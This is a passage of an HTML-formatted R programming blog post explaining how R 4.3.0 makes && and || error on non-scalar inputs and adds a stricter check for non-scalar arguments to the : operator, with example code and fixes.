&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; y &lt;span style="color:#8b949e;font-style:italic"&gt;# c(x[1] &amp;amp;&amp;amp; y[1], x[2] &amp;amp;&amp;amp; y[2], ...)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE FALSE FALSE FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&lt;/span&gt; y &lt;span style="color:#8b949e;font-style:italic"&gt;# c(x[1] || y[1], x[2] || y[2], ...)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE TRUE TRUE FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In R 4.2.0, a warning is thrown when a non-scalar input is passed to the
scalar operators, but a scalar logical is still returned (here, the result of
&lt;code&gt;x[1] &amp;amp;&amp;amp; y[1]&lt;/code&gt;). In earlier versions of R, no warning was printed.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; y
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[1] &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Warning messages&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; In x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;length(x) = 4 &amp;gt; 1&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; coercion to &lt;span style="color:#a5d6ff"&gt;&amp;#39;logical(1)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; In x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;length(x) = 4 &amp;gt; 1&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; coercion to &lt;span style="color:#a5d6ff"&gt;&amp;#39;logical(1)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This could lead to hidden bugs. For example, if you used this code in an
&lt;code&gt;if&lt;/code&gt; conditional, a warning would be printed when a non-scalar vector
was used but the code would continue happily:&lt;/p&gt;
&lt;!--- perhaps note that the &amp;, though utterly incorrect, would actually catch this bug here --&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; y) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;The world can&amp;#39;t end today...&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[1] &lt;span style="color:#a5d6ff"&gt;&amp;#34;The world can&amp;#39;t end today...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Warning messages&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; In x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;length(x) = 4 &amp;gt; 1&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; coercion to &lt;span style="color:#a5d6ff"&gt;&amp;#39;logical(1)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; In x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;length(x) = 4 &amp;gt; 1&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; coercion to &lt;span style="color:#a5d6ff"&gt;&amp;#39;logical(1)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In R 4.3.0, this warning has been elevated to an error and no value is
returned:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; y
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Error &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;length = 4&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; coercion to &lt;span style="color:#a5d6ff"&gt;&amp;#39;logical(1)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This stricter version of the scalar logical operators will help
catch those bugs where you didn’t realise a logical variable could
contain more than one entry.&lt;/p&gt;
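&lt;p&gt;When you hit this error, the fix is usually to decide what the condition should mean for a whole vector and to reduce it to a scalar explicitly. A minimal sketch, reusing the example vectors from above (the names &lt;code&gt;all_both&lt;/code&gt; and &lt;code&gt;any_pair&lt;/code&gt; are illustrative only):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;x = c(TRUE, TRUE, FALSE, FALSE)
y = c(TRUE, FALSE, TRUE, FALSE)

# Reduce each vector to a scalar first, then combine with the scalar operator
all_both = all(x) &amp;amp;&amp;amp; all(y) # is every entry of both vectors TRUE?

# Or combine element-wise, then reduce the result to a scalar
any_pair = any(x &amp;amp; y) # is at least one matched pair TRUE?

if (any_pair) {
  print("At least one matched pair is TRUE")
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Either form hands &lt;code&gt;if&lt;/code&gt; a single logical value, so it should behave the same way in R 4.2 and R 4.3.&lt;/p&gt;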
&lt;p&gt;To check whether the stricter operators will affect your
existing code before upgrading to R 4.3.0, you can set an environment
variable before running that code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In R:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.setenv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;_R_CHECK_LENGTH_1_LOGIC2_&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
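&lt;p&gt;One way to see the effect of the check is to wrap a suspect condition in &lt;code&gt;tryCatch()&lt;/code&gt;. The sketch below assumes R 4.2.x and uses the variable name &lt;code&gt;_R_CHECK_LENGTH_1_LOGIC2_&lt;/code&gt; (with a trailing underscore); &lt;code&gt;flags&lt;/code&gt; and &lt;code&gt;outcome&lt;/code&gt; are hypothetical names standing in for your own code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Assumption: R 4.2.x (from R 4.3.0 onwards the error is unconditional)
Sys.setenv("_R_CHECK_LENGTH_1_LOGIC2_" = "true")

# Hypothetical stand-in for a condition taken from your own code
flags = c(TRUE, FALSE)

# Record whether the condition ran cleanly, warned, or raised an error
outcome = tryCatch(
  {
    flags &amp;amp;&amp;amp; TRUE
    "ok"
  },
  warning = function(w) "warning",
  error = function(e) "error"
)
outcome
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If &lt;code&gt;outcome&lt;/code&gt; is anything other than &lt;code&gt;"ok"&lt;/code&gt;, the condition was given a non-scalar value and is worth reviewing before you upgrade.&lt;/p&gt;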
&lt;h3 id="a-more-logical-flow"&gt;A more logical flow&lt;/h3&gt;
&lt;!--- Sequences a:b --&gt;
&lt;p&gt;Where else do we work with scalars in R? Many functions expect certain
arguments to be scalars. For example, the &lt;code&gt;seq()&lt;/code&gt; function complains
with non-scalar arguments:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(from &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, to &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Error in seq.default(from = 1:3, to = 4): &amp;#39;from&amp;#39; must be of length 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(from &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, to &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Error in seq.default(from = 1, to = 4:5): &amp;#39;to&amp;#39; must be of length 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;There are several other places where R will throw an error if we provide
a value that is of the wrong size:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a_data_frame[[column_index]] &lt;span style="color:#8b949e;font-style:italic"&gt;# column_index must be a scalar&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a_matrix[rows, cols] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value &lt;span style="color:#8b949e;font-style:italic"&gt;# value must match the size of the replaced element(s)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;There are other places where R will throw a warning, and try to
gracefully handle values that are of an unexpected size:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R&amp;#39;s recycling rules are used to match the size of the vector input&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# c(1 * 2, 3 * 3, 5 * 2)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Warning in c(1, 3, 5) * c(2, 3): longer object length is not a multiple of&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## shorter object length&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 2 9 10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# The smaller vector was recycled to match the size of the larger&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# c(1, 3, 5) * c(2, 3, 2)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;An interesting case is the &lt;code&gt;:&lt;/code&gt; operator, which, like &lt;code&gt;seq()&lt;/code&gt;, can be used
to create sequences of numbers.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 3 4 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we provide a non-scalar on either side of the operator, R will warn
us:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[1] &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Warning message&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;In &lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; numerical expression has &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; elements&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; only the first used
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; (&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[1] &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Warning message&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;In &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; numerical expression has &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; elements&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; only the first used
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, because the output should be a single sequence, R has to pick a
specific value for the start- and the end-point of that sequence from
the arguments provided. It uses the first entry in each argument. So,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;(1:2) : 5&lt;/code&gt; is equivalent to &lt;code&gt;1:5&lt;/code&gt;; and&lt;/li&gt;
&lt;li&gt;&lt;code&gt;1 : (4:6)&lt;/code&gt; is equivalent to &lt;code&gt;1:4&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If your code is providing non-scalar arguments to &lt;code&gt;:&lt;/code&gt;, there may be a
bug in your code or the packages that it depends upon. R 4.3.0 has
introduced a stricter setting, which will catch the use of non-scalar
values when constructing sequences with the &lt;code&gt;:&lt;/code&gt; operator.&lt;/p&gt;
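&lt;p&gt;In your own functions, you can also guard against this directly by checking the lengths of the end-points before building the sequence. A minimal sketch (the helper &lt;code&gt;safe_range()&lt;/code&gt; is hypothetical, not part of R):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: only build a sequence from scalar end-points
safe_range = function(from, to) {
  stopifnot(length(from) == 1, length(to) == 1)
  from:to
}

safe_range(1, 4)
## [1] 1 2 3 4

# A non-scalar end-point now stops with an error instead of a warning
res = tryCatch(safe_range(1:2, 5), error = function(e) "error")
res
## [1] "error"
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This fails early in any version of R, whether or not the stricter setting is enabled.&lt;/p&gt;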
&lt;p&gt;Much like with the stricter logic comparisons described above, the R
developers have introduced this as an optional setting. After setting
the environment variable &lt;code&gt;_R_CHECK_LENGTH_COLON_&lt;/code&gt; to a true value, R
will throw an error whenever an oversized argument is passed into &lt;code&gt;a:b&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Without the check enabled:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[1] &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Warning message&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;In &lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; numerical expression has &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; elements&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; only the first used
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# With the strict check enabled:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.setenv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;_R_CHECK_LENGTH_COLON_&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
